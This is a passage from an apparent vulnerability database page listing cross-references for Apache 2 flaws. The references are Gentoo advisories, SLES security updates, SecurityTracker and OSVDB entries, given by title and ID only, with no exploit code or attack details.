for Apache 2 oes/CORE [64426] Gentoo Security Advisory GLSA 200907-04 (apache) [61381] Gentoo Security Advisory GLSA 200807-06 (apache) [60582] Gentoo Security Advisory GLSA 200803-19 (apache) [58745] Gentoo Security Advisory GLSA 200711-06 (apache) [57851] Gentoo Security Advisory GLSA 200608-01 (apache) [56246] Gentoo Security Advisory GLSA 200602-03 (Apache) [55392] Gentoo Security Advisory GLSA 200509-12 (Apache) [55129] Gentoo Security Advisory GLSA 200508-15 (apache) [54739] Gentoo Security Advisory GLSA 200411-18 (apache) [54724] Gentoo Security Advisory GLSA 200411-03 (apache) [54712] Gentoo Security Advisory GLSA 200410-21 (apache) [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache) [54677] Gentoo Security Advisory GLSA 200409-21 (apache) [54610] Gentoo Security Advisory GLSA 200407-03 (Apache) [54601] Gentoo Security Advisory GLSA 200406-16 (Apache) [54590] Gentoo Security Advisory GLSA 200406-05 (Apache) [54582] Gentoo Security Advisory GLSA 200405-22 (Apache) [54529] Gentoo Security Advisory GLSA 200403-04 (Apache) [54499] Gentoo Security Advisory GLSA 200310-04 (Apache) [54498] Gentoo Security Advisory GLSA 200310-03 (Apache) [11092] Apache 2.0.39 Win32 directory traversal [66081] SLES11: Security update for Apache 2 [66074] SLES10: Security update for Apache 2 [66070] SLES9: Security update for Apache 2 [65893] SLES10: Security update for Apache 2 [65888] SLES10: Security update for Apache 2 [65510] SLES9: Security update for Apache 2 [65249] SLES9: Security update for Apache 2 [65230] SLES9: Security update for Apache 2 [65228] SLES9: Security update for Apache 2 [65207] SLES9: Security update for Apache 2 [65136] SLES9: Security update for Apache 2 [65017] SLES9: Security update for Apache 2 SecurityTracker - https://www.securitytracker.com: [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users OSVDB - http://www.osvdb.org: [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure

Misc Metrics (click to expand)